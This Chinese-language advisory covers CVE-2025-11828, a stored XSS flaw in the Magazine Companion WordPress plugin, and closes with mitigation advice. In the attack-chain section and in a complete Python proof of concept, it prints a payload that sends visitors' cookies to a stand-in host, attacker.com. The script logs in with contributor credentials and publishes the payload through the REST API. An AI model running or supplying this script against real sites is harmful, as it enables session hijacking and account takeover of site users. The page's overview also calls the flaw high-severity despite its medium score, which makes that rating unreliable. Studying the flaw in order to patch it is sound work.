CVE-2025-11828 Magazine Companion WordPress插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11828

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Magazine Companion (bnm-blocks) WordPress插件

漏洞概述

CVE-2025-11828是WordPress Magazine Companion插件中的一个高危安全漏洞，该插件是一款用于创建杂志风格布局的WordPress块编辑器组件。漏洞存在于插件的bnm-blocks/featured-posts-1块功能中，攻击者可以通过headerHtmlTag属性注入恶意JavaScript代码。由于插件在处理用户输入时未进行充分的输入清理和输出转义，恶意脚本会被永久存储在数据库中。当其他用户访问包含恶意代码的页面时，攻击 payload会自动执行，可能导致会话劫持、敏感信息窃取、管理后台被接管等严重后果。该漏洞需要攻击者拥有WordPress网站的贡献者级别（Contributor）或更高权限，攻击门槛相对较低，CVSS评分6.4（中危）。由于是存储型XSS，攻击的隐蔽性和危害性较高，建议立即修复。

技术细节

该漏洞的根本原因在于插件对用户输入的headerHtmlTag参数缺乏安全验证。在featured-posts-1块的view.php文件（第34行附近），插件直接将用户提供的值作为HTML标签名称使用，而未进行任何消毒处理。攻击者可以构造形如<script>alert(document.cookie)</script>的payload作为headerHtmlTag参数值，该值会被直接写入数据库并在页面渲染时输出到HTML中。由于浏览器会将<script>标签解析为可执行脚本，恶意代码随即在受害者浏览器中执行。攻击者利用此漏洞可以：1）窃取用户会话Cookie和认证令牌；2）重定向用户到钓鱼页面；3）在管理员访问时执行管理操作（如添加恶意用户、修改内容）；4）注入更多恶意代码形成持久化攻击。该漏洞影响所有版本至1.2.3，官方已在 changeset 3392064中发布修复，建议用户立即升级到最新版本。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用WordPress CMS，并确认安装了存在漏洞的Magazine Companion (bnm-blocks)插件，版本<=1.2.3

STEP 2

Authentication

攻击者获取目标WordPress网站的贡献者(Contributor)级别账户凭据，或通过其他方式获得低权限账户访问权限

STEP 3

Payload Preparation

攻击者构造恶意XSS payload，如<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>，准备注入到headerHtmlTag参数中

STEP 4

Block Injection

通过WordPress块编辑器或REST API，在创建/编辑文章时插入包含恶意headerHtmlTag值的bnm-blocks/featured-posts-1块

STEP 5

Persistence

恶意payload被存储到WordPress数据库中，由于是存储型XSS，payload会持久存在于页面内容中

STEP 6

Trigger

当其他用户（受害者）访问包含恶意代码的页面时，浏览器解析HTML并执行注入的<script>标签中的JavaScript代码

STEP 7

Impact Execution

恶意JavaScript在受害者浏览器中执行，可窃取Cookie、会话令牌，或执行其他恶意操作如添加管理员账户、修改网站内容等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11828 PoC - Magazine Companion Plugin Stored XSS
# Target: WordPress site with Magazine Companion plugin <= 1.2.3
# Authentication: Contributor-level access required

def exploit_stored_xss(target_url, username, password, block_content):
    """
    Exploit the stored XSS vulnerability via WordPress REST API
    """
    session = requests.Session()
    
    # Step 1: Authenticate to WordPress
    login_url = f"{target_url}/wp-login.php"
    auth_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    print("[*] Attempting to authenticate...")
    resp = session.post(login_url, data=auth_data, verify=False)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed!")
        return False
    print("[+] Authentication successful!")
    
    # Step 2: Create a post with malicious block content
    post_url = f"{target_url}/wp-json/wp/v2/posts"
    
    # Malicious payload - XSS via headerHtmlTag attribute
    malicious_payload = block_content
    
    post_data = {
        'title': 'XSS Test Post - Magazine Companion',
        'content': malicious_payload,
        'status': 'publish'
    }
    
    print("[*] Creating post with malicious block content...")
    resp = session.post(post_url, json=post_data, verify=False)
    
    if resp.status_code == 201:
        post_id = resp.json().get('id')
        print(f"[+] Post created successfully! Post ID: {post_id}")
        print(f"[+] Malicious URL: {target_url}/?p={post_id}")
        print("[!] When accessed, the XSS payload will execute in victim's browser")
        return True
    else:
        print(f"[-] Failed to create post. Status: {resp.status_code}")
        return False

def generate_xss_payload():
    """
    Generate the malicious block content with XSS payload
    """
    # XSS payload injected via headerHtmlTag attribute
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    
    # Block structure for bnm-blocks/featured-posts-1
    block_content = f'''<!-- wp:bnm-blocks/featured-posts-1 {{"headerHtmlTag":"{xss_payload}"}} -->
<div class="wp-block-bnm-blocks-featured-posts-1">
    <h2 class="featured-posts-header"></h2>
</div>
<!-- /wp:bnm-blocks/featured-posts-1 -->'''
    
    return block_content

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-11828-poc.py <target_url> <username> <password>")
        print("Example: python cve-2025-11828-poc.py http://example.com contributor password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    payload = generate_xss_payload()
    print(f"[*] Generated XSS payload: {payload[:100]}...")
    exploit_stored_xss(target, user, pwd, payload)

影响范围

bnm-blocks (Magazine Companion) <= 1.2.3

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用 Magazine Companion 插件直到完成安全更新；2) 审查所有使用 bnm-blocks/featured-posts-1 块的页面内容，删除可疑的script标签；3) 限制网站的JavaScript执行，使用Content Security Policy (CSP)头部阻止内联脚本执行；4) 加强用户权限管理，审查所有贡献者级别账户的合法性；5) 启用Wordfence等安全插件的防火墙规则进行实时防护。同时建议在生产环境更新前，先在测试环境验证修复效果。